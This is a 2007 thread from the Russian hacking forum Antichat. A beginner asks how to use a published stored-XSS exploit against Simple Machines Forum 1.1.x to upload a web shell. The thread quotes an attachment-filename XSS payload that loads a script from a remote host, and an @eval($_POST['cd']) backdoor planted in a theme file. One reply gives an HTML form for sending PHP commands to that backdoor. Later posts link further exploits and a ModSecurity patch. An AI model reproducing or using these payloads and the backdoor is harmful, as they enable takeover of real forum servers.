Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   SMF Active XSS (тупой я) (https://forum.antichat.xyz/showthread.php?t=44007)

Emory 08.07.2007 14:41

SMF Active XSS (тупой я)
 
здрасте пишу тут редко... в основном читаю и пытаюсь сам разобраться... но похоже по жизни я тупой... короче прошу кое-что объснить если не трудно...

решил я сий метод опробовать...
установил SMF 1.1.3 и решил все сделать как написано тут (http://forum.antichat.ru/thread42244-SMF.html)
Значит узнать есть ли в этой версии
"Отсутствует фильтрация atachment filename" я не знал как ... но там написано 1.1.2... поэтому решил посмотреть исправлена ли эта ошибка в 1.1.3 (посмотрел что они изменили) (http://forum.antichat.ru/thread43089-SMF.html)
но там про это ни слова поэтому решил попробовать (я вам грил я нуб)
ну да ладно
значит начал тока готовиться(:D)
тупо скопировал ваш скрипт и тут подумал а нужно ли в нем что либо менять? в принципе это мой первый вопрос... ну короче я ничего не менял сохранил его ну и все... (зы решил я залить шелл)
тут возник еще один вопрос
Код:

name<img src=. width=1 height=1 onerror=javascript:var&#32s=document.createElement('script');s.src='http:  &#47&#47site.com&#47smfexp.js';document.documentElement.firstChild.  appendChild(s);>.txt
вот в этом тоже наверное что либо надо менять? так как посмотрел я на src=. и наверное тут должен быть сам шел... (это мои нубские предположения) (шел я решил взять (r57shell.php)( ps то что я делаю ваще прально??)
и видимо я должен буду туда ссылку на файл подставить? эт уже 3 или 4 вопрос...
еще не понял
Цитата:

По адресу http://vulnsite.com/smf/Themes/default/index.php получаем web shell
index.php который содержит код
Код:

@eval($_POST['cd']);

для чего дан этот код? если шел уже буит работать?

ps сразу грю сильно не ругайтесь...
ps2 я понимаю скорее всего в версии 1.1.3 это уже исправлено но тогда представьте что я это делал на версии 1.1.2 ..хотя бы поясните ост вопросы если не трудно
ps3 заранее пасиб

blackybr 09.07.2007 13:19

Цитата:

для чего дан этот код? если шел уже буит работать?
отправляешь скрипту пост запросы с шелл коммандами с параметром cd ..

а то что выше.. это не исполнение комманд.. это xss, читай маны

Dr.Z3r0 09.07.2007 13:43

Прочитал что ты там написал понял только последний твой вопрос... Вот его тебе обясню подробнее...
После заливки шела берешь создаешь у ся на компе вот такую html страницу:
Код:

<form action="+++адрес скрипта+++" method="post">
Выполнить пхп код: <input type="text" name="cd" value="">
<input type="submit" value="выполнить">
</form>

Вводишь какойнить пхп код который хочешь выполнить, меняешь +++адрес скрипта+++ на тот шо тебе нужен, давишь выполнить и усе...

n-000 13.07.2007 13:35

вот тут есть несколько примероф, может что полезнова для себя отыщеш
http://forum.antichat.ru/thread43633.html

Emory 17.07.2007 20:46

спасибо
сейчас буду ознакамливаться


только куда сувать сам шелл? его адрес?

bopoh13 18.07.2007 16:37

Цитата:

Сообщение от Emory
поэтому решил посмотреть исправлена ли эта ошибка в 1.1.3 (посмотрел что они изменили) (http://forum.antichat.ru/thread43089-SMF.html)
но там про это ни слова поэтому решил попробовать

Вопрос уже звучал: _http://www.simplemachines.ru/index.php/topic,2260.msg13571.html#msg13571
И был ответ (читать с цитаты): _http://www.simplemachines.ru/index.php/topic,2260.msg13666.html#msg13666
Ссылка на модуль (естественно, все на английском): _http://www.modsecurity.org/download/index.html

Хочу узнать, это гон?

Emory 23.07.2007 00:08

мде
короче все что было (в моих силах) я сделал...
понятно что профы взломают но мне не удалось...
поюзал сплойт попробывал чрез аватарку фотку итд... стоят ограничения везде...
сканил сканером ничего особо важного=(
похоже мне такой сайт с форумом который уже залатан...
в принципе похоже что Smf так свой баг и не исправил....
спасиб всем...=)
пойдем дальше+)

bopoh13 01.10.2007 14:06

Лавочку прикрыли =/
_http://www.simplemachines.org/community/index.php?topic=196380.0


Время: 22:56